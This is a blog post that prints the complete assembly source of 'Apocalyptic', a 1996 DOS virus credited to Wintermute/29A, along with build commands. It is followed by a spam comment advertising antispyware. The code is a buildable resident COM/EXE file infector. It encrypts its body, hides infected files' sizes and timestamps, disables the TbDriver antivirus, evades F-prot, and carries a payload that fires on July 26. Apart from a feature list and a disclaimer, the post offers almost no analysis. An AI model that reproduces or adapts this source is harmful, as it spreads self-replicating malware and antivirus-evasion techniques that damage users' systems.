This post is about an old virus Apocalyptic. It will be detected by almost all the antivirus softwares. It appeared in 1996.
The important characteristics of this virus is:
-TSR appending Com/Exe infector
-Has a routine to encrypt and another to decrypt ( ror+add+xor )
-Stealth ( 11h/12h/4eh/4fh/5700h )
-Deactivates Tbdriver when going into mem and when infecting
-Makes the int 3h point to the int21h on infection
-Fools f-prot's 'stealth detection'
-Non-detectable ( in 2nd generation ) by Tbav 7.05, F-prot 2.23c, Scan,
-Avp and else. TbClean doesn't clean it ( it gets lost with the Z Mcb
-searching loop,... really that product is a shit )
-Payload: On 26th of July it shows all file with size 029Ah ( 666 )
To assemble the virus code, use:
Tasm virus.asm
Tlink virus.obj
Please do not think that I am promoting the creation of virus. The details I have given is available on the internet for the public. The source code of Apocalyptic is given below:
.286
HOSTSEG segment BYTE
ASSUME CS:HOSTSEG, SS:CODIGO
Host:
mov ax,4c00h
int 21h
ends
CODIGO segment PARA
ASSUME CS:CODIGO, DS:CODIGO, SS:CODIGO
virus_size equ virus_end-virus_start
encrypt_size equ encrypt_end-encrypt_start
virus_start label byte
org 0h
Letsrock:
call delta ; Entry for Com/Exe
delta:
mov si,sp ; �-offset
mov bp,word ptr ss:[si]
sub bp,offset delta
push es ax ds
push cs
pop ds
call tomacha ; I don't call encryption
;on first generation
Encrypt_start label byte
;***************************************************************************
; RESIDENCE
;***************************************************************************
goon:
push es
call tbdriver ; Deactivate TbDriver
mov ah,52h ; Pick list of lists
int 21h
mov si,es:[bx-2] ; First MCB
mov es,si
Mcb_Loop:
cmp byte ptr es:[0],'Z' ; I search last Mcb.
je got_last
cont: add si,es:[3]
inc si
mov es,si
jmp Mcb_Loop
got_last:
pop dx
cmp word ptr es:[1],0h ; Is it free ?
je go_on
cmp word ptr es:[1],dx ; Or with active Psp ?
jne exit
go_on:
cmp word ptr es:[3],((virus_size+15)/16)+1
jb exit ; Is there space for me ?
push es ; If there is, I get resident
pop ds
mov di,es
add di,word ptr es:[3] ; Residence stuff; nothing
sub di,((virus_size+15)/16) ;special
push di
mov es,di
xor di,di
xor si,si
mov cx,8
rep movsw
pop di
inc di
mov word ptr es:[3],((virus_size+15)/16)+1
mov word ptr es:[1],di
mov byte ptr ds:[0],'M'
sub word ptr ds:[3],((virus_size+15)/16)+1
mov di,5
mov cx,12
xor al,al
rep stosb
push es cs
pop ds ax
inc ax
push ax
mov es,ax
xor di,di
mov si,bp
mov cx,(virus_size)
rep movsb
mov ax,3521h
int 21h
pop ds
mov ds:word ptr [int21h],bx
mov ds:word ptr [int21h+2],es
mov ah,25h
lea dx,main_center
int 21h
;***************************************************************************
; RETURN TO HOST
;***************************************************************************
exit:
pop ds ax es
dec byte ptr [flag+bp] ; Was it a Com ?
jz era_un_com
mov si,ds ; Recover stack
add si,cs:word ptr [ss_sp+bp]
add si,10h
cli
mov ss,si
mov sp,cs:word ptr [ss_sp+bp+2]
sti
mov si,ds ; Recover CS:IP
add si,cs:word ptr [cs_ip+bp+2]
add si,10h
push si
push cs:word ptr [cs_ip+bp]
retf ; Return to host
era_un_com:
mov di,100h ; If it's a Com, I make
push di ;it to return
lea si,bp+ss_sp
movsw
movsb
ret
condiciones:
push cx dx ; Payload trigger
mov ah,02ah ; Activates on 26th july
int 21h
cmp dx,071Ah
pop dx cx
jnz nain
stc
ret
nain:
clc
ret
;***************************************************************************
; TBDRIVER
;***************************************************************************
Tbdriver:
xor ax,ax ; Annulates TBdriver,...
mov es,ax ;really, this Av is a
les bx,es:[0084h] ;megashit.
cmp byte ptr es:[bx+2],0eah
jnz volvamos
push word ptr es:[bx+3]
push word ptr es:[bx+5]
mov es,ax
pop word ptr es:[0086h]
pop word ptr es:[0084h]
volvamos: ret
;***************************************************************************
; STEALTH 05700h
;***************************************************************************
Stealth_tiempo:
pushf
call dword ptr cs:[Int21h] ; Calls Int21h
push cx
and cl,01fh
xor cl,01fh
pop cx
jnz nada
or cl,01fh ; Changes seconds
nada:
retf 2
;****************************************************************************
; FCB STEALTH
;****************************************************************************
FCB_Stealth:
pushf ; Stealth of 11h/12h, by
call dword ptr cs:[Int21h] ;FCBs
test al,al
jnz sin_stealth
push ax bx es
mov ah,51h
int 21h
mov es,bx
cmp bx,es:[16h]
jnz No_infectado
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh
int 21h
pop ax
inc al
jnz Normal_FCB
add bx,7h
Normal_FCB:
mov al,es:[bx+17h]
and al,1fh
xor al,1fh
jnz No_infectado
sub word ptr es:[bx+1dh],Virus_size ; Old lenght of
sbb word ptr es:[bx+1fh],0 ;file and "normal"
and byte ptr es:[bx+17h],0F1h ;seconds
No_infectado:
call condiciones
jnc sin_nada
mov word ptr es:[bx+1dh],029Ah ; Virus's payload
mov word ptr es:[bx+1fh],0h
sin_nada:
pop es bx ax
Sin_stealth: retf 2
;****************************************************************************
; INT 21h
;****************************************************************************
main_center: ; The main center !
cmp ax,5700h
jz stealth_tiempo
cmp ah,11h
jz fcb_stealth
cmp ah,12h
jz fcb_stealth
cmp ah,4eh
jz handle_stealth
cmp ah,4fh
jz handle_stealth
cmp ah,4bh
je ejecutar
jmp saltito
;****************************************************************************
; HANDLE STEALTH
;****************************************************************************
handle_stealth:
pushf ; Handle stealth, functions
call dword ptr cs:[Int21h] ;4eh/4fh
jc adios_handle
pushf
push ax es bx cx
anti_antivirus:
mov ah,62h
int 21h
mov es,bx ; Is it F-prot ?
mov es,word ptr es:[2ch]
xor bx,bx
mov cx,100h
fpr:
cmp word ptr es:[bx],'-F'
jz sin_infectar ; Si lo es, pasamos de hacer
inc bx ;el stealth
loop fpr
mov ah,2fh
int 21h
mov al,es:[bx+16h]
and al,1fh
xor al,1fh
jnz sin_infectar
sub word ptr es:[bx+1ah],Virus_size ; Subs virus size
sbb word ptr es:[bx+1ch],0 ;and places coherent
and byte ptr es:[bx+16h],0F1h ;seconds
sin_infectar:
call condiciones
jnc no_payload
mov word ptr es:[bx+1ah],029Ah ; payload
mov word ptr es:[bx+1ch],0h
no_payload:
pop cx bx es ax
popf
adios_handle:
retf 2
;****************************************************************************
; EXE INFECTION
;****************************************************************************
ejecutar:
pushf
push ax bx cx dx si di ds es bp
mov di,ds
mov si,dx
call tbdriver ; deactivates TbDriver
mov ax,3503h ; Int 3h points to the
int 21h ;int 21h: less size and we
push cs ;fuck'em a bit
pop ds
mov ah,25h
lea dx,saltito
int 21h
push es bx ax
mov ax,3524h ; We handle int 24h
int 3h
mov ah,25h
lea dx,int24h
int 3h
push es bx ax
mov ds,di
mov dx,si
Noloes:
mov ax,4300h ; Saves and clears file
int 3h ;attributes
mov ax,4301h
push ax cx dx
xor cx,cx
int 3h
vamos_a_ver_si_exe:
mov byte ptr [flag],00h
mov ax,3d02h ; Opens file
int 3h
jc we_close
infect: xchg ax,bx
push cs
pop ds
mov ah,3fh ; Reads header
mov cx,01ch
lea dx,cabecera
int 3h
mov al,byte ptr [cabecera] ; Makes comprobations
add al,byte ptr [cabecera+1]
cmp al,'M'+'Z'
jnz go_close
cmp word ptr [cabecera+18h],40h
jz go_close
cmp word ptr [cabecera+1ah],0
jnz go_close ; If it's all right, goes on
jmp conti
go_close:
mov ds,di
mov dx,si
buscar_final: cmp byte ptr ds:[si],0 ; Searches end in ds:si
je chequeo
inc si
jmp buscar_final
chequeo:
push cs ; Is it a .COM ?
pop es
lea di,comtxt
sub si,3
cmpsw
jne we_close
jmp infeccion_com
we_close:
jmp close
conti:
mov ax,5700h ; Time/date of file
push ax
int 3h
push dx cx
and cl,1fh
xor cl,1fh
jz close_ant
call pointerant
cmp ax,0200h
ja contt
noinz: xor si,si ; To avoid changing
jmp close_ant ;date of non-infected
;files
contt:
push ax
pop si
shr ax,4
shl dx,12
add dx,ax
sub dx,word ptr ds:cabecera+8
push dx
and si,0fh
push si
call copy
pop si
pop dx
mov ds:word ptr [cs_ip+2],dx
inc dx
mov ds:word ptr [ss_sp],dx
mov ds:word ptr [cs_ip],si
mov ds:word ptr [ss_sp+2],((virus_size+100h-15h)/2)*2
call pointerant
mov cx,200h
div cx
inc ax
mov word ptr [cabecera+2],dx
mov word ptr [cabecera+4],ax
mov word ptr [cabecera+0ah],((virus_size)/16)+10h
mov ax,4200h
call pointer
mov cx,1ch
lea dx,cabecera
push cs
pop ds
mov ah,40h
int 3h
close_ant:
pop cx dx ax
or si,si
je close
inc ax
or cl,1fh
int 3h
close:
pop dx cx ax ; Attributes
inc ax
int 21h
mov ah,03eh
int 3h
nahyuck:
pop ax dx ds ; Restores Int 24h y 3h
int 3h
pop ax dx ds
int 3h
pop bp es ds di si dx cx bx ax
popf
jmp saltito
Pointerant:
mov ax,4202h
Pointer:
xor cx,cx
cwd
int 3h
ret
;****************************************************************************
; COM INFECTION
;****************************************************************************
infeccion_com:
mov ax,3d02h ; Open
int 3h
jc close
xchg bx,ax
push cs
pop ds
mov byte ptr [flag],1h ; To make the virus know it's
;a com when restoring
mov ax,5700h ; Time/date
push ax
int 3h
push dx cx
and cl,1fh
xor cl,1fh
jz close_ant
quesiquevale:
mov ah,3fh ; Reads beggining of file
mov cx,3
lea dx,ss_sp
int 3h
call pointerant ; Lenght check
cmp ax,0200h
ja puedes_seguir
cmp ax,(0ffffh-virus_size-100h)
jna puedes_seguir
alnoin: jmp noinz
puedes_seguir:
sub ax,3
mov word ptr [cabecera],ax
call copy ; Appending
mov ax,4200h
call pointer
mov ah,40h ; Jumping to code at
lea dx,salt ;beggining
mov cx,3h
int 3h
jmp close_ant
;****************************************************************************
; DATA
;****************************************************************************
autor: db 'Apocalyptic by Wintermute/29A'
comtxt: db 'COM'
flag: db 0
salt: db 0e9h
cabecera: db 0eh dup (90h)
SS_SP: dw 0,offset virus_end+100h
Checksum: dw 0
CS_IP: dw offset host,0
Cequis: dw 0,0,0,0
Encrypt_end label byte
copy:
push cs
pop ds
xor bp,bp ; Don't let bp fuck us
call encryptant ; Encrypts
mov ah,40h ; Copies
mov cx,virus_size
lea dx,letsrock
int 3h
call deencrypt ; Deencrypts
ret
;****************************************************************************
; ENCRYPT ROUTINE
;****************************************************************************
encryptant:
lea si,encrypt_end ; Encrypts
mov cx,encrypt_size
enc_loop: mov dl,byte ptr [si]
sub dl,2h
xor dl,0f9h
ror dl,4
mov byte ptr [si],dl
dec si
loop enc_loop
ret
deencrypt:
lea si,encrypt_end+bp ; Deencrypts
mov cx,encrypt_size
mov di,8
encri: mov dl,byte ptr [si]
mov al,dl
rol dl,4
xor dl,0f9h
add dl,2h
mov byte ptr [si],dl
dec si
loop encri
ret
Int24h: mov al,3
ret
Saltito: db 0eah
int21h: dw 0,0
virus_end label byte
tomacha:
mov cs:word ptr encrypt_start-2+bp,deencrypt-encrypt_start
ret
; This is cause I don't like putting a stupid flag,
; this two commands won't be copied
CODIGO ends
END Letsrock
VSTACK segment para STACK 'Stack'
db 100h dup (90h)
ends
Clear your computer of all the same bugs.
ReplyDeleteWhen you are searching for antispyware there is one that you can always depend on, it’s called Orbasoft Antispyware. The antispyware solution from Orbasoft can provide you with a scan that can find and clear your computer of all the same bugs that the more expensive scans can a much lower price. You can’t beat that, keep your computer running great for less. Visit their site at http://orbasoft.com to download this scan and get all the benefits it has to offer. If you’re like me, it will be the best decision you made in a long time.